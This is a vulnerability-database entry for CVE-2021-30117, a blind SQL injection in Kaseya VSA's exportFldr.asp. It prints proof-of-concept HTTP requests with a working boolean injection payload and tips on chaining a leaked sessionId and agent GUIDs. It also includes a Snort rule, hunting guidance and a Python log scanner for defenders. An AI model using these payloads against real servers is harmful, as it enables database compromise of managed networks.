cbcvebase.
CVE-2021-30117
published 2021-07-09


Priority P271 high 8.8 CVSS 3.1
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS: 72.05% (99.4th percentile)
The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId.

Detailed description
---

Given the following request:

```
GET /InstallTab/exportFldr.asp?fldrId=1' HTTP/1.1
Host: 192.168.1.194
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;
```

Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure.

Response:

```
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; Charset=Utf-8
Date: Thu, 01 Apr 2021 19:12:11 GMT
Strict-Transport-Security: max-age=63072000; includeSubDomains
Connection: close
Content-Length: 881

Whoops.
----SNIP----
```

However when fldrId is set to ‘(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))’ the request is allowed.

Request:

```
GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1
Host: 192.168.1.194
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;
```

Response:

```
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; Charset=Utf-8
Date: Thu, 01 Apr 2021 17:33:53 GMT
Strict-Transp
```

Affected

1 ranges
| Vendor | Product | Version range | Fixed in |
|--------|---------|---------------|----------|
| kaseya | vsa     | < 9.5.6       | 9.5.6    |

Detection & IOCs (extracted from sources)

url: /InstallTab/exportFldr.asp
path: /dl.asp
snort:

```
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Kaseya VSA Authenticated SQL Injection in exportFldr (CVE-2021-30117)"; flow:established,to_server; http.uri; content:"/InstallTab/exportFldr.asp?"; fast_pattern; content:"fldrId|3d|"; pcre:"/^[^&]*?(?:(?:S(?:HOW\x20(?:C(?:UR(?:DAT|TIM)E|HARACTER\x20SET)|(?:VARI|T)ABLES)|ELECT\x20(?:FROM|USER|SLEEP))|U(?:NION\x20SELEC|PDATE\x20SE)T|DELETE\x20FROM|INSERT\x20INTO)|S(?:HOW.+(?:C(?:HARACTER.+SET|UR(DATE|TIME))|(?:VARI|T)ABLES)|ELECT.+(?:FROM|USER))|U(?:NION.+SELEC|PDATE.+SE)T|DELETE.+FROM|INSERT.+INTO|\x2f\*.+\*\x2f)/Ri"; reference:url,csirt.divd.nl/cves/CVE-2021-30117/; reference:cve,2021-30117; classtype:web-application-attack; sid:2065485; rev:1; metadata:affected_product Kaseya_VSA, attack_target Server, tls_state TLSDecrypt, created_at 2025_10_27, cve CVE_2021_30117, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2025_10_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
```
  • Exploitation is semi-authenticated: a valid sessionId cookie (obtainable via CVE-2021-30116 credential leak) is required. Correlate detections for CVE-2021-30116 sessionId harvesting with subsequent requests to /InstallTab/exportFldr.asp.
  • Monitor for SQL keywords (SELECT, UNION, CASE, WHEN, FROM, SLEEP, INSERT, DELETE, UPDATE) URL-encoded or plaintext in the fldrId query parameter of requests to /InstallTab/exportFldr.asp.
  • Agent GUIDs can be retrieved from the local registry of a compromised host running a VSA agent and used for authentication bypass via /dl.asp. Hunt for registry reads of the VSA agent GUID key on endpoints.
  • The Snort/ET rule (sid:2065485) should be deployed at both perimeter and internal sensors with TLS inspection enabled (tls_state TLSDecrypt) to catch encrypted exploitation attempts.
  • Exploitation requires a valid sessionId cookie, which must first be obtained via CVE-2021-30116 (credentials leak / business logic flaw). This CVE alone is not exploitable without that prerequisite session token.
  • Kaseya's SaaS VSA platform was stated to not be vulnerable to the exploited vulnerabilities; only on-premises VSA servers are affected.
  • The ET Snort rule requires TLS decryption to be effective against HTTPS-protected VSA deployments.
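
The fldrId keyword monitoring described above can also be run over web server logs, where TLS decryption is not needed. The following is an added example, not code from this page or from Kaseya: it assumes IIS W3C-format logs with the standard cs-uri-stem, cs-uri-query, c-ip and sc-status fields, assumes legitimate fldrId values are plain integers, and uses constructed sample log lines.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

TARGET_STEM = "/installtab/exportfldr.asp"   # compared case-insensitively
SQL_WORDS = re.compile(
    r"\b(SELECT|UNION|CASE|WHEN|FROM|SLEEP|INSERT|DELETE|UPDATE)\b", re.I)

def fully_decode(value, max_rounds=3):
    """Undo nested URL-encoding (%2553ELECT -> %53ELECT -> SELECT), bounded."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_w3c_log(lines):
    """Return one finding per suspicious fldrId value in a W3C-format log."""
    fields, findings = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for later rows
            continue
        if line.startswith("#") or not line.strip():
            continue
        row = dict(zip(fields, line.split()))
        if row.get("cs-uri-stem", "").lower() != TARGET_STEM:
            continue
        for key, value in parse_qsl(row.get("cs-uri-query", ""),
                                    keep_blank_values=True):
            if key.lower() != "fldrid":
                continue
            value = fully_decode(value)
            words = sorted({w.upper() for w in SQL_WORDS.findall(value)})
            # Assumption: legitimate folder ids are plain integers.
            if words or not value.isdigit():
                findings.append({"ip": row.get("c-ip"),
                                 "status": row.get("sc-status"),
                                 "fldrId": value, "keywords": words})
    return findings

# Constructed sample log (not real traffic); addresses are documentation ranges.
SAMPLE = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2021-04-01 19:10:00 GET /InstallTab/exportFldr.asp fldrId=1 198.51.100.7 200
2021-04-01 19:12:11 GET /InstallTab/exportFldr.asp fldrId=1%27 203.0.113.9 500
2021-04-01 19:12:30 GET /InstallTab/exportFldr.asp fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 203.0.113.9 200
2021-04-01 19:13:02 GET /installtab/EXPORTFLDR.asp FLDRID=%2528SELECT%25201%2520UNION%2520SELECT%25202%2529 203.0.113.9 500
2021-04-01 19:14:00 GET /default.asp - 198.51.100.7 200
""".splitlines()
```

The quote-only probe from the first request on this page contains no SQL keyword, so it is caught only by the integer check; findings from the same client with mixed 500 and 200 statuses match the boolean-based pattern the description shows.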

CVSS provenance

nvd | v3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvd | v2.0 | 6.5 | MEDIUM | AV:N/AC:L/Au:S/C:P/I:P/A:P